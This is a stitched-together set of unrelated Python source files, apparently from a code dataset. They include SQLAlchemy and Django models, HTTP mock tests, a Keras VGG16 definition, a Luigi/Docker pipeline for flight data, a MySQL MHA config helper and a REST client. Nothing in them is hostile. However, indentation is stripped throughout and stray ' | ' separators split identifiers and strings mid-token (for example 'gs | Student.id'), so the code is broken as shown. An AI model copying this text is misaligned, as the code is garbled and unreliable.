s = etree.fromstring(s)
md['summary'] = squash_xml_to_text(s, remove_namespaces=True)
return md
def id_from_metadata(metadata):
"""Given an model's metadata, discover the id."""
identifier = "cnx-archive-uri"
return metadata.get(identifier)
def scan_for_id_mapping(start_dir):
"""Collect a mapping of content ids to filepaths relative to the given
directory (as ``start_dir``).
This is necessary because the filesystem could be organized as
a `book-tree`, which is a hierarchy of directories that are labeled
by title rather than by id.
:param start_dir: a directory to start the scan from
:type start_dir: :class:`pathlib.Path`
:return: mapping of content ids to the content filepath
:rtype: {str: pathlib.Path, ...}
"""
mapping = {}
for filepath in start_dir.glob('**/index.cnxml'):
with filepath.open('rb') as fb:
xml = etree.parse(fb)
md = convert_to_model_compat | _metadata(parse_cnxml_metadata(xml))
id = id_from_metadata(md)
id = id.split('@')[0]
mapping[id] = filepath
return mapping
def scan_for_uuid_mapping(start_dir):
"""Collect a mapping of content UUIDs to filepaths relative to the given
directory (as ``start_dir``).
This is similar to ``scan_for_id_mapping``, but instead of using the ID
value | found in CNXML as the key, we want the same mapping keyed by the
UUID in the corresponding metadata.json file if it's available.
:param start_dir: a directory to start the scan from
:type start_dir: :class:`pathlib.Path`
:return: mapping of content uuids to the content filepath
:rtype: {str: pathlib.Path, ...}
"""
mapping = {}
for filepath in start_dir.glob('**/index.cnxml'):
metadata_file = filepath.parent / 'metadata.json'
if metadata_file.exists():
with metadata_file.open('r') as metadata_json:
metadata = json.load(metadata_json)
uuid = metadata['id']
mapping[uuid] = filepath
else:
# Fallback to trying CNXML for UUID metadata
metadata = parse_cnxml_metadata(etree.parse(filepath.open()))
uuid = metadata.get('uuid')
if uuid:
mapping[uuid] = filepath
return mapping
def build_id_to_uuid_mapping(id_to_path_map, uuid_to_path_map):
"""Build a mapping of ID to UUID values based upon matching paths
:param id_to_path_map: A mapping of IDs (m12345) to filepaths
:type id_to_path_map: {str: pathlib.Path, ...}
:param uuid_to_path_map: A mapping of UUIDs to filepaths
:type uuid_to_path_map: {str: pathlib.Path, ...}
:return: mapping of ids to uuids
:rtype: {str: str, ...}
"""
mapping = {}
path_to_uuid_map = {
str(path): uuid for uuid, path in uuid_to_path_map.items()
}
for id, path in id_to_path_map.items():
mapping[id] = path_to_uuid_map.get(str(path))
return mapping
|
jaduff/goodstanding | goodstanding/models.py | Python | bsd-3-clause | 2,768 | 0.004335 | from sqlalchemy import (
Column,
Index,
Integer,
Text,
Table,
ForeignKey,
String,
Boolean,
DateTime,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
from zope.sqlalchemy import ZopeTransactionExtension
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
#class MyModel(Base):
# __tablename__ = 'models'
# id = Column(Integer, primary_key=True)
# name = Column(Text)
# value = Column(Integer)
gsClassStudent = Table('gsClassStudent',
Base.metadata,
Column('id', Integer, primary_key=True),
Column('classid', Integer, ForeignKey('gsClass.id')),
Column('studentid', Integer, ForeignKey('gsStudent.id'))
)
class gsUser(Base):
__tablename__ = 'gsUser'
id = Column(Integer, primary_key=True)
username = Column(String(120), index=True, unique=True)
FirstName = Column(String(120), index=True, unique=False)
LastName = Column(String(120), index=True, unique=False)
myClasses = relationship('gsClass', back_populates="teacher")
def __repr__(self):
return '<User %r>' % (self.username)
class gsStudent(Base):
__tablename__ = 'gsStudent'
id = Column(Integer, primary_key=True, autoincrement=False)
username = Column(String(64), index=True, unique=True)
FirstName = Column(String(120), index=True, unique=False)
LastName = Column(String(120), index=True, unique=False)
cohort = Column(Integer, index=True, unique=False)
current = Column(Boolean, default=False)
class gsClass(Base):
__tablename__ = 'gsClass'
id = Column(Integer, primary_key=True)
classCode = Column(String(64), index=True, unique=False)
cohort = Column(Integer, index=True, unique=False)
#teacher = Column(String(120), index=True, unique=False)
teacherid = Column(Integer, ForeignKey('gsUser.id'))
teacher = relationship('gsUser', back_populates="myClasses")
calendarYear = Column(Integer, index=True, unique=False)
students = relationship('gsStudent',
secondary=gsClassStudent,
primaryjoin=(gsClassStudent.c.classid == id),
secondaryjoin=(gsClassStudent.c.studentid == gs | Student.id),
lazy='dynamic')
|
class gsClassNote(Base):
__tablename__ = 'gsClassNote'
Noteid = Column(Integer, primary_key=True)
classStudentid = Column(Integer, ForeignKey('gsClassStudent.id'))
note = Column(Text, index=False, unique=False)
value = Column(Integer, index=False)
date = Column(DateTime, index=True)
#Index('my_index', MyModel.name, unique=True, mysql_length=255)
|
NickMolloy/rt_api | tests/mock_api.py | Python | gpl-3.0 | 935 | 0.002139 | from httmock import all_requests
@all_requests
def non_json_episode_response(url, request):
return {'status_code': 200, 'content': None}
@all_requests
def unauthorized_episode_response(url, request):
return {'status_code': 401, 'content': '{"error": "access_denied", "error_message": "The resource owner or authorization server denied the request."}'}
@all_requests
def none_ok_episode_response(url, request):
return {'status_code': 500, 'content': None}
@all_requests
def fail_get_token(url, request):
return {'status_code': 401, 'content': '{"error":"invalid_client","error_message":"Client authentication failed."}'}
@all_requests
def non_json | _repsonse_for_authentication(url, request):
return {'status_code': 500, 'content': 'Something went wrong.'}
@all_requests
def test_forbidden_repsonse_for_authentication(url, request):
return {'stat | us_code': 403, 'content': '{"error": "access_denied"}'}
|
Southpaw-TACTIC/TACTIC | src/test/pipeline_test.py | Python | epl-1.0 | 143 | 0.013986 |
import tacticenv
import unittest
from pyasm.security import B | atch
Batch()
from pyasm.biz.pipeline_test impor | t ProcessTest
unittest.main()
|
cosmos342/VisionClassifier | vgg16.py | Python | mit | 8,410 | 0.005589 | # -*- coding: utf-8 -*-
"""VGG16 model for Keras.
# Reference
- [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from keras.models import Model
from keras.layers import Flatten, Dense, Input,Lambda
from keras.layers import Convolution2D, MaxPooling2D
from keras.engine.topology import get_source_inputs
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from keras import backend as K
import numpy as np
from keras.applications.imagenet_utils import decode_predictions, preprocess_input
#sandeep to fix later
#, _obtain_input_shape
TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
vgg_mean = np.array([123.68, 116.779, 103.939], dtype=np.float32).reshape((3,1,1))
def img_preprocess(x):
x = x - vgg_mean
return x[:,::-1]
def VGG16(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
classes=1000):
"""Instantiate the VGG16 architecture,
optionally loading weights pre-trained
on ImageNet. Note that when using TensorFlow,
for best performance you should set
`image_dim_ordering="tf"` in your Keras config
at ~/.keras/keras.json.
The model and the weights are compatible with both
TensorFlow and Theano. The dimension ordering
convention used by the model is the one
specified in your Keras config file.
# Arguments
include_top: whether to include the 3 fully-connected
layers at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: opti | onal shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `tf` dim ordering)
or `(3, 224, 244)` (with `th` dim ordering).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 48.
E.g. `(200, 200, 3)` would be one valid value.
classes: optional number of classes to classify images
into, only to be s | pecified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
#input_shape = _obtain_input_shape(input_shape,
# default_size=224,
# min_size=48,
# dim_ordering=K.image_dim_ordering(),
# include_top=include_top)
# sandeep to fix later for now do this as topmodel is retained n theano
input_shape = (3,224,224)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# Block 1
print("sandeep adding lambda layer buddy good luck ")
x = Lambda(img_preprocess,input_shape=(3,224,224),output_shape=(3,224,224))(img_input)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(x)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
# Block 2
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x)
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
# Block 3
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
# Block 4
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
# Block 5
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
if include_top:
# Classification block
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu', name='fc1')(x)
x = Dense(4096, activation='relu', name='fc2')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name='vgg16')
# load weights
if weights == 'imagenet':
if K.image_dim_ordering() == 'th':
if include_top:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5',
TH_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
TH_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
if include_top:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_ |
hamasho/endojo | apps/games/listening/models.py | Python | gpl-3.0 | 4,489 | 0 | import os
import datetime
from datetime import timedelta
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from core.utils import date_range
class Package(models.Model):
title = models.CharField(max_length=200, unique=True)
level = models.SmallIntegerField()
pub_date = models.DateTimeField(default=timezone.now)
class Meta:
ordering = ['-pub_date']
@staticmethod
def get_package_list(user):
packages = Package.objects.all().order_by('level', 'title')
result = []
for package in packages:
try:
state = PackageState.objects.get(
user=user,
package=package,
)
state = 'Complete' if state.complete else 'Learning'
except PackageState.DoesNotExist:
state = 'Yet'
n_tried = PackageState.objects.filter(
package=package,
).count()
n_completed = PackageState.objects.filter(
package=package,
complete=True,
).count()
result.append({
'id': package.id,
'title': package.title,
'level': package.level,
'pub_date': package.pub_date,
'state': state,
'n_tried': n_tried,
'n_completed': n_completed,
})
return result
def upload_directory(instance, filename):
basename = os.path.basename(filename)
return 'listening_audio/%d/%s' % (instance.package.id, basename)
class Problem(models.Model):
problem_text = models.CharField(max_length=200)
package = models.ForeignKey(Package)
audio_file = models.FileField(upload_to=upload_directory)
level = models.SmallIntegerField()
class PackageState(models.Model):
"""
A state which shows an user has completed the package or not.
If `complete` is `True`, he/she has completed.
If `false`, he/she tried but gave up.
"""
user = models.ForeignKey(User, related_name='listen | ing_packagestate_user')
package = models.ForeignKey(Package)
complete = models.BooleanField(default=True)
class Meta:
unique_together = ('user', 'package')
class ProblemScore(models.Model):
user = models.ForeignKey(User, related_name='listening_problemscore_user')
problem = models.ForeignKey(Problem)
response_time_ms = models.IntegerField(null=True | )
complete = models.BooleanField(default=True)
update_date = models.DateTimeField(default=timezone.now)
class Meta:
unique_together = ('user', 'problem')
def save(self, *args, **kwargs):
"""
When saving scores, also have to update History model.
"""
if self.complete:
today, created = History.objects.get_or_create(
user=self.user,
level=self.problem.level,
date=datetime.date.today()
)
avg = today.problem_count * today.average_time_ms
today.problem_count += 1
today.average_time_ms = \
(avg + self.response_time_ms) / today.problem_count
today.save()
super(ProblemScore, self).save(*args, **kwargs)
class History(models.Model):
user = models.ForeignKey(User, related_name='listening_history_user')
level = models.SmallIntegerField()
problem_count = models.IntegerField(default=0)
average_time_ms = models.IntegerField(default=0)
date = models.DateField(auto_now_add=True)
class Meta:
ordering = ['date']
@staticmethod
def get_formatted_stats(user):
"""
Format user's score data to fit Chart.js data structure
"""
result = {
'1': [],
'2': [],
'3': [],
'4': [],
'5': [],
}
histories = History.objects.filter(user=user)
if len(histories) == 0:
return result
start_date = histories[0].date
end_date = histories[len(histories) - 1].date
for date in date_range(start_date, end_date + timedelta(1)):
histories_at = histories.filter(date=date)
for history in histories_at:
result[str(history.level)] += [{
'x': date,
'y': history.average_time_ms / 1000,
}]
return result
|
nanounanue/rita-pipeline | rita/pipelines/rita.py | Python | gpl-3.0 | 6,982 | 0.006307 | # coding: utf-8
"""
rita Pipeline
.. module:: rita
:synopsis: rita pipeline
.. moduleauthor:: Adolfo De Unánue <nanounanue@gmail.com>
"""
import os
import subprocess
from pathlib import Path
import boto3
import zipfile
import io
import csv
import datetime
import luigi
import luigi.s3
import pandas as pd
import sqlalchemy
from contextlib import closing
import requests
import re
from bs4 import BeautifulSoup
## Variables de ambiente
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
## Obtenemos las llaves de AWS
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
## Logging
import rita.config_ini
import logging
logger = logging.getLogger("rita.pipeline")
import rita.pipelines.utils
import rita.pipelines.common
from rita.pipelines.common.tasks import DockerTask
class ritaPipeline(luigi.WrapperTask):
"""
Task principal para el pipeline
"""
def requires(self):
yield DownloadRITACatalogs()
yield DownloadRITAData()
class DownloadRITACatalogs(luigi.WrapperTask):
"""
"""
def requires(self):
baseurl = "https://www.transtats.bts.gov"
url = "https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236"
page = requests.get(url)
soup = BeautifulSoup(page.content, "lxml")
for link in soup.find_all('a', href=re.compile('Download_Lookup')):
catalog_name = link.get('href').split('=L_')[-1]
catalog_url = '{}/{}'.format(baseurl, link.get('href'))
yield DownloadCatalog(catalog_name=catalog_name, catalog_url=catalog_url)
class DownloadCatalog(luigi.Task):
"""
"""
catalog_url = luigi.Parameter()
catalog_name = luigi.Parameter()
root_path = luigi.Parameter()
def run(self):
logger.debug("Guardando en {} el catálogo {}".format(self.output().path, self.catalog_name))
with closing(requests.get(self.catalog_url, stream= True)) as response, \
self.output().open('w') as output_file:
for chunk in response.iter_lines(chunk_size=1024*8):
if chunk:
output_file.write(chunk.decode('utf-8') + '\n')
def output(self):
output_path = '{}/catalogs/{}.csv'.format(self.root_path,
self.catalog_name)
return luigi.s3.S3Target(path=output_path)
class DownloadRITAData(luigi.WrapperTask):
"""
"""
start_year=luigi.IntParameter()
def requires(self):
today = datetime.date.today() + datetime.timedelta(days=-90)
max_year = today.year
max_month = today.month
years = range(self.start_year, max_year)
logger.info("Descargando datos de los años {}".format(years))
for año in years:
if año != max_year:
months = range(1,13)
else:
month = range(1, max_month+1)
for mes in months:
yield DownloadRITAMonthlyData(year=año, month=mes)
class DownloadRITAMonthlyData(DockerTask):
"""
"""
year = luigi.IntParameter()
month = luigi.IntParameter()
root_path = luigi.Parameter()
raw_path = luigi.Parameter()
@property
def cmd(self):
return '''
docker run --rm --env AWS_ACCESS_KEY_ID={} --env AWS_SECRET_ACCESS_KEY={} rita/download-rita --year {} --month {} --data_path {}/{}
'''.format(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, self.year, self.month, self.root_path, self.raw_path)
def output(self):
return luigi.s3.S3Target(path='{}/{}/{}-{}.zip'.format(self.root_path,
self.raw_path,
str(self.month).zfill(2),
self.year))
class ExtractColumns(luigi.Task):
"""
"""
task_name = "extract-columns"
year = luigi.IntParameter()
month = luigi.IntParameter()
root_path = luigi.Parameter()
bucket = luigi.Parameter()
etl_path = luigi.Parameter()
def requires(self):
return DownloadRITA(year=self.year, month=self.month)
def run(self):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.bucket)
input_path = Path(self.input().path)
obj = bucket.Object(str(input_path.relative_to('s3://{}'.format(self.bucket))))
df = None
with io.BytesIO(obj.get()["Body"].read()) as input_file:
input_file.seek(0)
with zipfile.ZipFile(input_file, mode='r') as zip_file:
for subfile in zip_file.namelist():
with zip_file.open(subfile) as file:
df = pd.read_csv(file)
with self.output().open('w') as output_file:
output_file.w | rite(df.loc[:, 'YEAR':'DIV_AIRPORT_LANDINGS'].to_csv(None,
sep="|",
header=True,
| index=False,
encoding="utf-8",
quoting=csv.QUOTE_ALL))
def output(self):
return luigi.s3.S3Target('{}/{}/{}/YEAR={}/{}.psv'.format(self.root_path,
self.etl_path,
self.task_name,
self.year,
str(self.month).zfill(2)))
class RTask(luigi.Task):
root_path = luigi.Parameter()
def requires(self):
return RawData()
def run(self):
cmd = '''
docker run --rm -v rita_store:/rita/data rita/test-r
'''
logger.debug(cmd)
out = subprocess.check_output(cmd, shell=True)
logger.debug(out)
def output(self):
return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_R.psv"))
class PythonTask(luigi.Task):
def requires(self):
return RTask()
def run(self):
cmd = '''
docker run --rm -v rita_store:/rita/data rita/test-python --inputfile {} --outputfile {}
'''.format(os.path.join("/rita/data", os.path.basename(self.input().path)),
os.path.join("/rita/data", os.path.basename(self.output().path)))
logger.debug(cmd)
out = subprocess.call(cmd, shell=True)
logger.debug(out)
def output(self):
return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_python.json"))
|
ovaistariq/mha-helper | mha_helper/config_helper.py | Python | gpl-3.0 | 8,633 | 0.00278 | # (c) 2015, Ovais Tariq <me@ovaistariq.net>
#
# This file is part of mha_helper
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import fnmatch
import os
import socket
import re
import ConfigParser
class ConfigHelper(object):
MHA_HELPER_CONFIG_DIR = '/etc/mha-helper'
MHA_HELPER_CONFIG_OPTIONS = ['writer_vip_cidr', 'vip_type', 'report_email', 'smtp_host', 'requires_sudo',
'super_read_only', 'requires_arping', 'cluster_interface', 'kill_after_timeout']
VIP_PROVIDER_TYPE_NONE = 'none'
VIP_PROVIDER_TYPE_METAL = 'metal'
VIP_PROVIDER_TYPE_AWS = 'aws'
VIP_PROVIDER_TYPE_OS = 'openstack'
VIP_PROVIDER_TYPES = [VIP_PROVIDER_TYPE_NONE, VIP_PROVIDER_TYPE_METAL, VIP_PROVIDER_TYPE_AWS, VIP_PROVIDER_TYPE_OS]
# This stores the configuration for every host
host_config = dict()
@staticmethod
def load_config():
pattern = '*.conf'
if not os.path.exists(ConfigHelper.MHA_HELPER_CONFIG_DIR):
return False
for root, dirs, files in os.walk(ConfigHelper.MHA_HELPER_CONFIG_DIR):
for filename in fnmatch.filter(files, pattern):
config_file_path = os.path.join(ConfigHelper.MHA_HELPER_CONFIG_DIR, filename)
print("Reading config file: %s" % config_file_path)
config_parser = ConfigParser.RawConfigParser()
config_parser.read(config_file_path)
# Read the default config values first. The default config values are used when a config option is not
# defined for the specific host
if not config_parser.has_section('default'):
return False
default_config = dict()
for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
opt_value = config_parser.get('default', opt)
if not ConfigHelper.validate_config_value(opt, opt_value):
print("Parsing the option '%s' with value '%s' failed" % (opt, opt_value))
return False
default_config[opt] = opt_value
# Setup host based configs. Initially hosts inherit config from the default section but override them
# within their own sections
for hostname in config_parser.sections():
ConfigHelper.host_config[hostname] = dict()
# We read the options from the host section of the config
for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
if config_parser.has_option(hostname, opt) and opt != 'writer_vip_cidr' and opt != 'smtp_host':
ConfigHelper.host_config[hostname][opt] = config_parser.get(hostname, opt)
# We now read the options from the default section and if any option has not been set by the host
# section we set that to what is defined in the default section, writer_vip_cidr is always read from
# the default section because it has to be global for the entire replication cluster
# If the option is not defined in both default and host section, we throw an error
for opt in ConfigHelper.MHA_HELPER_CONFIG_OPTIONS:
if (opt not in ConfigHelper.host_config[hostname] or opt == 'writer_vip_cidr' or
opt == 'smtp_host'):
# If the host section did not define the config option and the default config also does
# not define the config option then we bail out
if opt not in default_config:
print("Missing required option '%s'. The option should either be set in default "
"section or the host section of the config" % opt)
return False
ConfigHelper.host_config[hostname][opt] = default_config[opt]
# If no host configuration was found it is still an error as we may be analyzing empty files
if len(ConfigHelper.host_config) < 1:
return False
return True
@staticmethod
def validate_config_value(config_key, config_value):
if config_key == 'writer_vip_cidr':
return ConfigHelper.validate_ip_address(config_value)
if config_key == 'vip_type':
return config_value in ConfigHelper.VIP_PROVIDER_TYPES
if config_key == 'report_email':
return ConfigHelper.validate_email_address(config_value)
if config_key == 'smtp_host':
return ConfigHelper.validate_hostname(config_value)
if config_key == 'kill_after_timeout':
return ConfigHelper.validate_integer(config_value)
if config_key == 'requires_sudo':
return config_value in ['yes', 'no']
if config_key == 'requires_arping':
return config_value in ['yes', 'no']
if config_key == 'cluster_interface':
return config_value is not None and len(config_value) > 0
if config_key == 'super_read_only':
return config_value in ['yes', 'no']
@staticmethod
def validate_ip_address(ip_address):
try:
socket.inet_pton(socket.AF_INET, ip_address.split('/')[0])
except socket.error:
try:
socket.inet_pton(socket.AF_INET6, ip_address.split('/')[0])
except socket.error:
return False
return True
return True
@staticmethod
def validate_email_address(email_address):
pattern = '^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$'
return bool(re.match(pattern, email_address))
@staticmethod
def validate_integer(potential_integer):
try:
int(potential_integer)
except ValueError:
return False
return True
@staticmethod
def validate_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == ".":
| hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
if not all(allowed.match(x) for x in hostname.split(".")):
return False
# Now we try to resolve the hostname and error out if we cannot
try:
socket.gethostbyname(hostname)
except Exception as e:
print("Failed to resolve the hostname %s: %s" % (hostname, str(e) | ))
return False
return True
def __init__(self, host):
self._host = host
if host not in self.__class__.host_config:
raise ValueError
self._host_config = self.__class__.host_config[host]
def get_writer_vip(self):
return self.get_writer_vip_cidr().split('/')[0]
def get_writer_vip_cidr(self):
return self._host_config['writer_vip_cidr']
def get_vip_type(self):
return self._host_config['vip_type']
def get_manage_vip(self):
return self._host_config['vip_type'] != 'none'
def get_report_email(self):
return self._host_config['report_email']
def get_smtp_host(self):
return self._host_config['smtp_host']
def get_kill_after_timeout(self):
return int(self._host_config['kill_after_timeout'])
def get_requires_sudo(self):
if self._host |
taulk/oj | LeetCode/[11]container-with-most-water/Solution.py | Python | unlicense | 395 | 0.002532 | class Solution(object):
def maxArea(self, height):
"""
:ty | pe height: List[int]
:rtype: int
"""
i = 0
j = len(height)-1
| res = 0
while i<j:
res = max(res, min(height[i], height[j]) * (j-i))
if height[i] > height[j]:
j = j - 1
else:
i = i + 1
return res
|
opennetworkinglab/spring-open-cli | cli/storeclient.py | Python | epl-1.0 | 15,736 | 0.005719 | #
# Copyright (c) 2010,2011,2012,2013 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#
# module: storeclient.py
#
# This module manages communication with the console, i.e. the REST interface
# of a Big Switch Controller node.
import urllib
import urllib2
import ftplib
import json
import datetime
import time
import traceback
import url_cache
class StringReader():
# used for ftp, as a replacement for read from an existing file
def __init__(self, value):
"""
Value can be a string, or a generator.
"""
self.value = value
self.offset = 0
if type(value) == str or type(value) == unicode:
self.len = len(value)
else:
self.last = None
def read(self, size = None):
if size:
if size > self.len - self.offset:
size = self.len - self.offset
result = self.value[self.offset:size]
self.offset += size
return result
# supporing generators.
if self.last: # use remainder
if size > self.len - self.offset:
size = self.len - self.offset
result = self.last[self.offset:size]
self.offset += size
if self.offset == self.len:
self.last = None
return result
item = value.next()
len_item = len(item)
if len_item <= size:
return item
# set up remainder
result = item[:size]
self.last = item[size:]
self.offset = 0
self.len = len(self.last)
return result
class StoreClient():
controller = None
display_rest = False
display_rest_reply = False
table_read_url = "http://%s/rest/v1/model/%s/"
entry_post_url = "http://%s/rest/v1/model/%s/"
user_data_url = "http://%s/rest/v1/d | ata/"
sdn_platform_data_url | = "http://%s/rest/v1/system/"
def set_controller(self,controller):
self.controller = controller
def display_mode(self, mode):
self.display_rest = mode
def display_reply_mode(self, mode):
self.display_rest_reply = mode
def set_sdn_controller_platform_rest_if(self, sdn_controller_rest_if):
url = self.sdn_platform_data_url % (self.controller)
url = url + "restifaddr/"
data = self.rest_post_request(url, sdn_controller_rest_if)
def rest_simple_request(self,url, use_cache = None, timeout = None):
# include a trivial retry mechanism ... other specific
# urllib2 exception types may need to be included
retry_count = 0
if use_cache == None or use_cache:
result = url_cache.get_cached_url(url)
if result != None:
return result
while retry_count > 0:
try:
return urllib2.urlopen(url, timeout = timeout).read()
except urllib2.URLError:
retry_count -= 1
time.sleep(1)
# try again without the try...
if self.display_rest:
print "REST-SIMPLE:", 'GET', url
result = urllib2.urlopen(url, timeout = timeout).read()
if self.display_rest_reply:
print 'REST-SIMPLE: %s reply "%s"' % (url, result)
url_cache.save_url(url, result)
return result
def rest_json_request(self, url):
entries = url_cache.get_cached_url(url)
if entries != None:
return entries
result = self.rest_simple_request(url)
# XXX check result
entries = json.loads(result)
url_cache.save_url(url, entries)
return entries
def rest_post_request(self, url, obj, verb='PUT'):
post_data = json.dumps(obj)
if self.display_rest:
print "REST-POST:", verb, url, post_data
request = urllib2.Request(url, post_data, {'Content-Type':'application/json'})
request.get_method = lambda: verb
response = urllib2.urlopen(request)
result = response.read()
if self.display_rest_reply:
print 'REST-POST: %s reply: "%s"' % (url, result)
return result
def get_table_from_store(self, table_name, key=None, val=None, match=None):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, table_name)
if not match:
match = "startswith"
if key and val:
url = "%s?%s__%s=%s" % (url, key, match, urllib.quote_plus(val))
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request(url)
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
def get_object_from_store(self, table_name, pk_value):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, table_name)
url += (pk_value + '/')
result = url_cache.get_cached_url(url)
if result != None:
return result
if self.display_rest:
print "REST-MODEL:", url
response = urllib2.urlopen(url)
if response.code != 200:
# LOOK! Should probably raise exception here instead.
# In general we need to rethink the store interface and how
# we should use exceptions.
return None
data = response.read()
result = json.loads(data)
if self.display_rest_reply:
print 'REST-MODEL: %s reply: "%s"' % (url, result)
url_cache.save_url(url, result)
return result
# obj_data must contain a key/val and any other required data
def rest_create_object(self, obj_type, obj_data):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url_cache.clear_cached_urls()
url = self.entry_post_url % (self.controller, obj_type)
data = self.rest_post_request(url, obj_data)
# LOOK! successful stuff should be returned in json too.
if data != "saved":
result = json.loads(data)
return result
url_cache.clear_cached_urls()
def find_object_from_store(self, obj_type, key, val):
if not self.controller:
